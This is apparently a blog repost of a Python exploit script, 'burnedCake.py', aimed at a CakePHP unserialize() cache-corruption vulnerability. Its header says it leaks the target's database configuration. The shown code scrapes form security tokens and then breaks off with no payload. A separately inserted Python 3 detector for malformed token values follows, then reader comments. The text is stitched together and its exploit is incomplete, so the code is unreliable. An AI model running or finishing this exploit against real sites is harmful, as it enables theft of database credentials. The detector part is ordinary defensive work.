CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit


Apr 22 2015



#!/usr/bin/python
#
# burnedCake.py - CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
# written by felix@malloc.im
#
# This code exploits a unserialize() vulnerability in the CakePHP security
# component. See http://malloc.im/CakePHP-unserialize.txt for a detailed
# analysis of the vulnerability.
#
# The exploit should work against every CakePHP-based application that
# uses POST forms with security tokens and has not changed the cache
# configuration (file-system caching is the default). Exploiting
# other caching configurations is possible but not as elegant.
#
# This PoC outputs the database config file of the running CakePHP application;
# other payloads are easily possible by changing the PHP code.

from optparse import OptionParser
from urlparse import urlparse,urljoin
import urllib2
import urllib
import re

def request(url,data="",headers={},debug=0):
    # Build a GET request when no body is given, otherwise a POST request.
    if (data==""):
        req = urllib2.Request(url=url,headers=headers)
    else:
        req = urllib2.Request(url=url,headers=headers,data=data)

    # debuglevel=1 makes urllib2 dump the raw request/response on stdout.
    debug_handler = urllib2.HTTPHandler(debuglevel = debug)
    opener = urllib2.build_opener(debug_handler)
    response=opener.open(req)
    return response


if __name__=="__main__":

    parser = OptionParser(usage="usage: %prog [options] url")
    parser.add_option("-p", "--post", dest="post",
                      help="additional post content as urlencoded string")
    parser.add_option("-v", action="store_true", dest="verbose",
                      help="verbose mode")

    (options, args) = parser.parse_args()
    if len(args)!=1:
        parser.error("wrong number of arguments")
    if options.verbose:
        debug=1
    else:
        debug=0
    if not options.post:
        options.post=""
    url=urlparse(args[0])
    # Fetch the page that contains the POST form protected by the Security component.
    html=request(url.geturl(),debug=debug ).read()

    try:
        # Security token key, form action and the fields hash (32 hex chars) of the form.
        key=re.search("data\[_Token\]\[key\]\" value=\"(.*?)\"",html).group(1)
        path=re.search('method="post" action="(.*?)"',html).group(1)
        fields=re.search('data\[_Token\]\[fields\]" value="([0-9a-f]{32}).*?"',html).group(1)
    except AttributeError:
        # re.search() returned None, so .group() failed: the form did not look as expected.
        print "[x] Regex failed! :("
        exit()
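An added defender-side check, not part of the exploit above and not CakePHP's own code: a request filter that accepts a `data[_Token][fields]` value only when it has the shape the exploit's own regex expects (a 32-hex-character hash), assumed here to be optionally followed by `:` and a `|`-separated list of field names, and classifies anything else as anomalous before it could reach `unserialize()`. The POST bodies are constructed samples, and the length cap is an assumed value.

```python
import re
from urllib.parse import parse_qs

# Expected shape: the 32-hex hash the exploit's regex looks for, plus an
# assumed optional ':' and '|'-separated list of locked field names (Model.field.0).
TOKEN_FIELDS_RE = re.compile(r"^[0-9a-f]{32}(?::[A-Za-z0-9_.]+(?:\|[A-Za-z0-9_.]+)*)?$")
MAX_LEN = 2048  # assumed upper bound for a legitimate fields token


def check_token_fields(post_body: str) -> str:
    """Classify one urlencoded POST body as 'ok', 'missing', 'too_long' or 'malformed'."""
    params = parse_qs(post_body, keep_blank_values=True)
    values = params.get("data[_Token][fields]")
    if not values:
        return "missing"
    value = values[0]
    if len(value) > MAX_LEN:
        return "too_long"
    if not TOKEN_FIELDS_RE.match(value):
        return "malformed"
    return "ok"


def scan_bodies(bodies):
    """Return (index, verdict) for every body that is not a clean submission."""
    return [(i, v) for i, v in enumerate(map(check_token_fields, bodies)) if v != "ok"]


# Constructed sample POST bodies (no real traffic).
GOOD_HASH = "0123456789abcdef0123456789abcdef"
SAMPLE_BODIES = [
    # benign submission: hash, ':' and two locked field names
    "data[_Token][key]=abc&data[_Token][fields]=" + GOOD_HASH
    + "%3APost.title%7CPost.body&data[Post][title]=hi",
    # form posted without the fields token at all
    "data[_Token][key]=abc&data[Post][title]=hi",
    # tail after ':' contains braces and semicolons, which are never field names
    "data[_Token][fields]=" + GOOD_HASH + "%3A%7B%3B%7D&data[Post][title]=x",
    # oversized token
    "data[_Token][fields]=" + GOOD_HASH + "%3A" + "A" * 3000,
]

if __name__ == "__main__":
    for idx, verdict in scan_bodies(SAMPLE_BODIES):
        print("body #%d: %s" % (idx, verdict))
```

Any body that is not `ok` is worth logging with the source address, since a legitimate CakePHP form never produces such a value.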

Tags: EXP cake

Copyright notice: unless otherwise stated, this article is original work by mOon; please keep the source attribution when reposting.

2 comments

IT疯狂女

2015-04-22 16:45 (first comment)
I feel like I don't understand any of this.

mOon

2015-04-22 18:17
@IT疯狂女: Uh, it's just a simple exploit.